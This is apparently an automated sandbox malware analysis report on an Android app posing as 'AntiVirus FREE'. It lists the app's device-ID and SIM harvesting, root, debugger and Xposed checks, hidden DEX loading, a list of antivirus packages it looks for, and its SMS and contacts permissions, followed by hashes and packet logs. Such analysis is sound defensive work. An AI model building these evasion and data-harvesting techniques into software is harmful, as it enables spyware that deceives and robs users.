Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:56Field Access: android.os.Build.DISPLAY
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:59Field Access: android.os.Build.HOST
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:62Field Access: android.os.Build.ID
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:65Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:68Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:71Field Access: android.os.Build.PRODUCT
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:74Field Access: android.os.Build.TAGS
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:77Field Access: android.os.Build.TYPE
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:80Field Access: android.os.Build.USER
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:86Field Access: android.os.Build$VERSION.RELEASE
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:88Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:89Field Access: android.os.Build.MANUFACTURER
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:90Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:91Field Access: android.os.Build.MODEL
Source: com.czybg.eqtbdmzpklrgyns.xnLvoQ;->DiXsQ:12Field Access: android.os.Build.TAGS
Source: mpio.fabric.sdk.android.services.common.CommonUtils$Architecture;->getValue:48Field Access: android.os.Build.CPU_ABI
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isEmulator:229Field Access: android.os.Build.PRODUCT
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isEmulator:232Field Access: android.os.Build.PRODUCT
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isRooted:236Field Access: android.os.Build.TAGS
Source: mpio.fabric.sdk.android.services.common.IdManager;->getModelName:112Field Access: android.os.Build.MANUFACTURER
Source: mpio.fabric.sdk.android.services.common.IdManager;->getModelName:114Field Access: android.os.Build.MODEL
Source: mpio.fabric.sdk.android.services.common.IdManager;->getOsDisplayVersionString:119Field Access: android.os.Build$VERSION.RELEASE
Source: mpcom.crashlytics.android.core.CrashlyticsUncaughtExceptionHandler;->writeSessionDevice:506Field Access: android.os.Build.MODEL
Source: mpcom.crashlytics.android.core.CrashlyticsUncaughtExceptionHandler;->writeSessionDevice:507Field Access: android.os.Build.MANUFACTURER
Source: mpcom.crashlytics.android.core.CrashlyticsUncaughtExceptionHandler;->writeSessionDevice:508Field Access: android.os.Build.PRODUCT
Source: mpcom.crashlytics.android.core.SessionProtobufHelper;->writeSessionOS:334Field Access: android.os.Build$VERSION.RELEASE
Queries several sensitive phone informationsShow sources
Source: Lmpio/fabric/sdk/android/services/settings/DefaultSettingsSpiCall;->applyHeadersTo(Lmpio/fabric/sdk/android/services/network/HttpRequest;Lmpio/fabric/sdk/android/services/settings/SettingsRequest;)Lmpio/fabric/sdk/android/services/network/HttpRequest;Method string: "android"
Source: Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;-><init>(I)VMethod string: "cpu"
Source: Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;-><init>(Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;Landroid/telephony/TelephonyManager;)VMethod string: "imsi"
Source: Lmpcom/crashlytics/android/answers/SessionEventTransform;->buildJsonForEvent(Lmpcom/crashlytics/android/answers/SessionEvent;)Lorg/json/JSONObject;Method string: "type"
Source: Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/NQaBq;Method string: "version"
Source: Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/NQaBq;Method string: "sid"
Source: Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct()Lorg/json/JSONObject;Method string: "manufacturer"
Source: Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->DiXsQ()Landroid/telephony/TelephonyManager;Method string: "phone"
Source: Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;-><init>(Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;Landroid/content/Context;Landroid/telephony/TelephonyManager;Lcom/czybg/eqtbdmzpklrgyns/LmcGi;)VMethod string: "imei"
Source: Lcom/czybg/eqtbdmzpklrgyns/UBLcF;->onPostExecute(Ljava/lang/Object;)VMethod string: "model"
Source: Lmpio/fabric/sdk/android/services/common/CommonUtils;->isEmulator(Landroid/content/Context;)ZMethod string: "sdk"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:40API Call: android.provider.Settings$Secure.getString
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isEmulator:227API Call: android.provider.Settings$Secure.getString
Source: mpio.fabric.sdk.android.services.common.IdManager;->getAndroidId:69API Call: android.provider.Settings$Secure.getString
Tries to detect XPosed instrumentation frameworkShow sources
Source: Letxtfvw/cqwwrwk;->YVAFbUcSQ()ZMethod string: /system/framework/XposedBridge.jar
Source: Letxtfvw/cqwwrwk;->attachBaseContext(Landroid/content/Context;)VMethod string: /system/framework/XposedBridge.jar

Anti Debugging:

barindex
Checks if debugger is runningShow sources
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isDebuggerAttached:223API Call: android.os.Debug.isDebuggerConnected
Potentially drops DEX filesShow sources
Source: Initial APKFile created: cXdqo.smali
Source: Initial APKFile created: cls.dex
Source: Initial APKFile created: sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
Access the class loader (often done to load a new code)Show sources
Source: etxtfvw.cqwwrwk;->YRkFJMV:225API Call: java.lang.Class.getDeclaredField("mClassLoader")
Source: Letxtfvw/cqwwrwk;->YRkFJMV()VMethod string: "mClassLoader"
Creates a new jar file (likely to load a new code)Show sources
Source: etxtfvw.cqwwrwk;->attachBaseContext:361API Call: java.io.File.<init>

HIPS / PFW / Operating System Protection Evasion:

barindex
Uses the DexClassLoader (often used for code injection)Show sources
Source: pvsaeqhpgq.zvsin;->attachBaseContext:28API Call: dalvik.system.DexClassLoader.<init>("/data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip")
Source: pvsaeqhpgq.zvsin;->attachBaseContext:30API Call: dalvik.system.DexClassLoader.loadClass (not executed)

Language, Device and Operating System Detection:

barindex
Checks if phone is rooted (checks for Superuser.apk)Show sources
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isRooted:240API Call: java.io.File.<init>("/system/app/Superuser.apk")
Checks if phone is rooted (checks for test-keys build tags)Show sources
Source: com.czybg.eqtbdmzpklrgyns.xnLvoQ;->DiXsQ:14API Call: java.lang.String.contains("test-keys")
Source: mpio.fabric.sdk.android.services.common.CommonUtils;->isRooted:238API Call: java.lang.String.contains("test-keys")
Queries the SIM provider ISO country codeShow sources
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->xnLvoQ:63API Call: android.telephony.TelephonyManager.getSimCountryIso returned ""
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:34API Call: android.telephony.TelephonyManager.getSimCountryIso
Queries the SIM provider numeric MCC+MNC (mobile country code + mobile network code)Show sources
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:13API Call: android.telephony.TelephonyManager.getSimOperator
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:35API Call: android.telephony.TelephonyManager.getSimOperator
Queries the WIFI MAC addressShow sources
Source: com.czybg.eqtbdmzpklrgyns.LmcGi;->Odjrct:21API Call: android.net.wifi.WifiInfo.getMacAddress
Queries the network operator ISO country codeShow sources
Source: com.czybg.eqtbdmzpklrgyns.HLqFdR;->xnLvoQ:69API Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:11API Call: android.telephony.TelephonyManager.getNetworkCountryIso
Queries the network operator nameShow sources
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:12API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:36API Call: android.telephony.TelephonyManager.getNetworkOperatorName
Queries the unqiue device ID (IMEI, MEID or ESN)Show sources
Source: com.czybg.eqtbdmzpklrgyns.hrYSUpo;-><init>:15API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:15API Call: android.telephony.TelephonyManager.getSimSerialNumber
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:37API Call: android.telephony.TelephonyManager.getLine1Number
Source: com.czybg.eqtbdmzpklrgyns.jfIitJ;-><init>:38API Call: android.telephony.TelephonyManager.getSubscriberId

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
May check for install Android security applications (AV and firewalls)Show sources
Source: Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)VMethod string: "com.drweb"
Source: Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)VMethod string: "com.eset.ems2.gp"
Source: Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)VMethod string: "com.drweb.pro"
Source: Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)VMethod string: "com.drweb.pro.market"
Source: Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)VMethod string: "com.qihoo.security"
Source: Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)VMethod string: "com.qihoo.security.lite"

Stealing of Sensitive Information:

barindex
Has permission to read contactsShow sources
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Has permission to read the SMS storageShow sources
Source: submitted apkRequest permission: android.permission.READ_SMS
Has permission to read the phones state (phone number, device IDs, active call ect.)Show sources
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Has permission to receive SMS in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Has permissions to create, read or change account settings (inlcuding account password settings)Show sources
Source: submitted apkRequest permission: android.permission.GET_ACCOUNTS
Monitors incoming Phone callsShow sources
Source: com.czybg.eqtbdmzpklrgyns.Pu9qND8a41hRxRegistered receiver: android.intent.action.PHONE_STATE
Queries a list of installed applicationsShow sources
Source: com.czybg.eqtbdmzpklrgyns.QsRifJa;->DiXsQ:39API Call: android.content.pm.PackageManager.queryIntentActivities

Antivirus Detection

Initial Sample

SourceDetectionCloudLink
5wd2rZUWEk49%virustotalBrowse

Dropped Files

No Antivirus matches

Domains

SourceDetectionCloudLink
play.googleapis.com0%virustotalBrowse
www.gstatic.com2%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

android-buttoncam-android

Created / dropped Files

/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
File Type:Zip archive data, at least v2.0 to extract
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
MD5:F2331E42879BEFF575745020556C99EF
SHA1:C39FC7622E47DA40A15670536ADAC1B01A90BDF1
SHA-256:61F54317B64327FC0B592D265A84391B714E67F30D9473DBAF6DF715F6D8DA5C
SHA-512:339A97529D690A83770A8A944D055908A646AE738FDB7206B9FF8978034A5612FED4A37132B9C3F43CB9E32D048D9EF0E051880E85B1B425284BDA9636ABC325
Malicious:false
Reputation:low
/data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
File Type:Dalvik dex file version 035
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
MD5:33FEBA241D388E830B985DE0945C2000
SHA1:F31204F7C0E44A939EA233F35FBC5AA30817E338
SHA-256:7F79D01ADD22D5E70FA3BCFAE3C51D0BE32D337A2E660A109BBB141E1FA4D959
SHA-512:BCC090E398466CB41AD563FF0FC458414BB44BE3B22BD3099D7528DA11DF45E463F5FFAE924F1E768827C30D0DB5B52E83D7E60F68577042FAB267FFB3E5B40E
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
play.googleapis.com172.217.20.74truefalse0%, virustotal, Browse
www.gstatic.com172.217.17.99truefalse2%, virustotal, Browse

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
8.8.8.8United States
15169GOOGLE-GoogleIncUSfalse
172.217.17.99United States
15169GOOGLE-GoogleIncUSfalse
172.217.20.74United States
15169GOOGLE-GoogleIncUSfalse
172.217.17.138United States
15169GOOGLE-GoogleIncUSfalse

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.978031457513307
TrID:
  • Android Package (19004/1) 52.05%
  • Java Archive (13504/1) 36.99%
  • ZIP compressed archive (4004/1) 10.97%
File name:5wd2rZUWEk
File size:527982
MD5:3b574b67bf5a80c43e6430d69b72e6ec
SHA1:72b9b211982a86e04bb3fc2bc74f55dd5a73d56a
SHA256:7503c7ddc1fe21f5f50f592f9c528b7d80dc77f053fa97d1ee0cd7d8fb1378a8
SHA512:270e7e4aa9f6f7080f952a247d8aa539fcb872b2d708fb28a135da00c1fdea2e7a3bed3678feb694f431d2644f0959d8b943ac845fda2476ce3dd58561ef1b4c
File Content Preview:PK..........VK..GR............META-INF/MANIFEST.MF..K..H....Q...3aT....1.P...B....$..............kVD......{R.1r .^....._^.o....C.A.U../.o..._.Xa`..e..4. .}.......D......P.........,..<..V.c..)N..G...$~Kc..I.....ro.|y.........$F9...7........|..A...R$.....#.

Static APK Info

General

Label:AntiVirus FREE
Minimum SDK required:9
Target SDK required:22
Version Code:53
Version Name:53
Package Name:com.czybg.eqtbdmzpklrgyns
Is Activity:true
Is Receiver:true
Is Service:true
Requests System Level Permissions:false
Play Store Compatible:true

Activities

NameIs Entrypoint
com.czybg.eqtbdmzpklrgynscom.czybg.eqtbdmzpklrgyns.FooVJESlkd1K
com.czybg.eqtbdmzpklrgynsoleevf.oiqgkl.kcfcwv.bzsy.ehkjwyuad.grdoikz
com.czybg.eqtbdmzpklrgynscom.czybg.eqtbdmzpklrgyns.SplashActivitytrue
com.czybg.eqtbdmzpklrgynscom.czybg.eqtbdmzpklrgyns.AyMuwwlC
com.czybg.eqtbdmzpklrgynscom.czybg.eqtbdmzpklrgyns.ProgressActivity
com.czybg.eqtbdmzpklrgynscom.czybg.eqtbdmzpklrgyns.BaseActivity

Receivers

  • com.czybg.eqtbdmzpklrgyns.BYdZZAIwCWFdZwW
  • Intent: android.app.action.DEVICE_ADMIN_ENABLED, android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED, android.app.action.ACTION_DEVICE_ADMIN_DISABLED
  • com.czybg.eqtbdmzpklrgyns.Pu9qND8a41hRx
  • Intent: android.intent.action.PACKAGE_REPLACED, android.intent.action.PACKAGE_ADDED, android.intent.action.PACKAGE_INSTALL, android.intent.action.PHONE_STATE, android.net.wifi.WIFI_STATE_CHANGED, android.net.wifi.STATE_CHANGE, android.intent.action.BOOT_COMPLETED, android.net.conn.CONNECTIVITY_CHANGE, android.intent.action.ACTION_BATTERY_LOW, android.intent.action.ACTION_BATTERY_OKAY, android.net.ConnectivityManager.CONNECTIVITY_ACTION, android.net.wifi.supplicant.CONNECTION_CHANGE, com.android.res
  • com.czybg.eqtbdmzpklrgyns.X39SzVuK0Fg5ZMqLx

Services

  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.BMcoejIXiwV
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.HOtny8Tb
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.KdfKw0C
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.O0qC6jwgEnHh
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.PYViEQnPOshkW8
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.S49U6BODT8
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.WJY2Ahxkjz
  • fszdepyq.bpxcvwhmp.qchfn
  • Intent: xuskmlpe.tiaszz.pxvltcxj.nlsty.qteafq (Priority 0)
  • zjswnzgx.fswiicam.iwrcuay

Permission Requested

  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.ACCESS_WIFI_STATE
  • android.permission.CHANGE_NETWORK_STATE
  • android.permission.CHANGE_WIFI_STATE
  • android.permission.GET_ACCOUNTS
  • android.permission.GET_TASKS
  • android.permission.INTERNET
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_PROFILE
  • android.permission.READ_SMS
  • android.permission.REAL_GET_TASKS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_EXTERNAL_STORAGE
  • com.android.launcher.permission.UNINSTALL_SHORTCUT

Certificate

Name:classes.dex
Issuer:CN=,OU=,O=US,L=US,ST=US,C=US
Subject:CN=,OU=,O=US,L=US,ST=US,C=US

Resources

NameTypeSize
ic_launcher.pngPNG image, 48 x 48, 8-bit/color RGBA, non-interlaced3087
AndroidManifest.xmlDBase 3 data file (12184 records)12184
button_pressed_background.xmlDBase 3 data file (728 records)728
ic_launcher.pngPNG image, 96 x 96, 8-bit/color RGBA, non-interlaced7607
finish_button.xmlDBase 3 data file (740 records)740
layout_round_corner_progress_bar.xmlDBase 3 data file (824 records)824
layout_icon_round_corner_progress_bar.xmlDBase 3 data file (1216 records)1216
activity_main.xmlDBase 3 data file (1312 records)1312
button_pressed.pngPNG image, 666 x 666, 8-bit/color RGBA, non-interlaced32372
progress_image.pngPNG image, 366 x 366, 8-bit colormap, non-interlaced5852
bhwdzkxwhvfdy.xmlDBase 3 data file (392 records)392
ic_launcher.pngPNG image, 192 x 192, 8-bit/color RGBA, non-interlaced19992
antivirus_logo.pngPNG image, 424 x 554, 8-bit colormap, non-interlaced8227
474271.SFASCII text, with CRLF line terminators2954
round_corner_progress_icon.pngPNG image, 48 x 48, 8-bit colormap, non-interlaced283
button_background.xmlDBase 3 data file (728 records)728
XbHcMPcWXOjWMempty0
base_activity.xmlDBase 3 data file (1384 records)1384
MANIFEST.MFASCII text, with CRLF line terminators2833
474271.RSAdata1262
antivirus.pngPNG image, 469 x 59, 8-bit colormap, non-interlaced2186
round_corner_progress_icon.pngPNG image, 144 x 144, 8-bit colormap, non-interlaced915
classes.dexDalvik dex file version 03512032
round_corner_progress_icon.pngPNG image, 96 x 96, 8-bit colormap, non-interlaced562
scan_button.xmlDBase 3 data file (740 records)740
resources.arscdata7632
layout_text_round_corner_progress_bar.xmlDBase 3 data file (1012 records)1012
round_corner_progress_icon.pngPNG image, 72 x 72, 8-bit colormap, non-interlaced452
button_unpressed.pngPNG image, 666 x 666, 8-bit/color RGBA, non-interlaced31784
bcg_gradient.xmlDBase 3 data file (720 records)720
scan_process_activity.xmlDBase 3 data file (2200 records)2200
UMQrTOWqmLFASCII text581760
stars_finish.pngPNG image, 511 x 487, 8-bit colormap, non-interlaced9599
ic_launcher.pngPNG image, 72 x 72, 8-bit/color RGBA, non-interlaced6043
ic_launcher.pngPNG image, 144 x 144, 8-bit/color RGBA, non-interlaced19430
cls.dex.drDalvik dex file version 035430652
sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip.drZip archive data, at least v2.0 to extract5859
classes.dexDalvik dex file version 03511728

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Dec 21, 2017 18:02:12.773937941 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.774888039 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.774914026 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.804580927 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.804631948 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.805079937 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.805103064 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.805191994 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.806221008 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.806243896 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.806247950 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.806637049 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.821661949 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.821683884 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.822499990 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.822520018 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.822602034 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.822706938 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.822729111 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.822731972 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.823005915 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.840337992 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.840359926 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.840749979 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.840770006 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.840851068 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.853682995 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.853703976 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.853707075 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.854027033 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.854403019 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.854429007 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.854657888 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.854674101 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.854748964 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.855029106 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.855047941 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.855051041 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.855272055 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.874509096 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.874535084 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.874813080 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.874830961 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.874905109 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.885030985 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.885051966 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.885055065 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.885324955 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.885417938 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.885437012 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.885632038 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.885647058 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.885711908 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.886651993 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.886682034 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.886686087 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.886739016 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.902626038 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.902676105 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.903065920 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.903085947 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.903158903 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.917807102 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.917901993 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.917910099 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.917989969 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.918026924 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.918247938 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.918303013 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.918314934 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.918445110 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.940706968 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.940767050 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.940773964 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.941080093 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.943342924 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.943378925 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.943665981 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.943682909 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.943876028 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.948705912 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.948744059 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.948750019 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.949037075 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.949937105 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.949954987 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950504065 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.950520039 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950603962 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.950695038 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950728893 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950736046 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950820923 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950856924 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.950907946 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.950953960 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.950964928 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.951092005 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.980469942 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.980509043 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.980515003 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.981506109 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.981872082 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.981911898 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.982438087 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.982454062 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.982592106 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.982629061 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.982629061 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.982644081 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.982985973 CET49818443192.168.2.2172.217.17.138
Dec 21, 2017 18:02:12.996901035 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.996965885 CET44349818172.217.17.138192.168.2.2
Dec 21, 2017 18:02:12.997241020 CET49818443192.168.2.2172.217.17.138
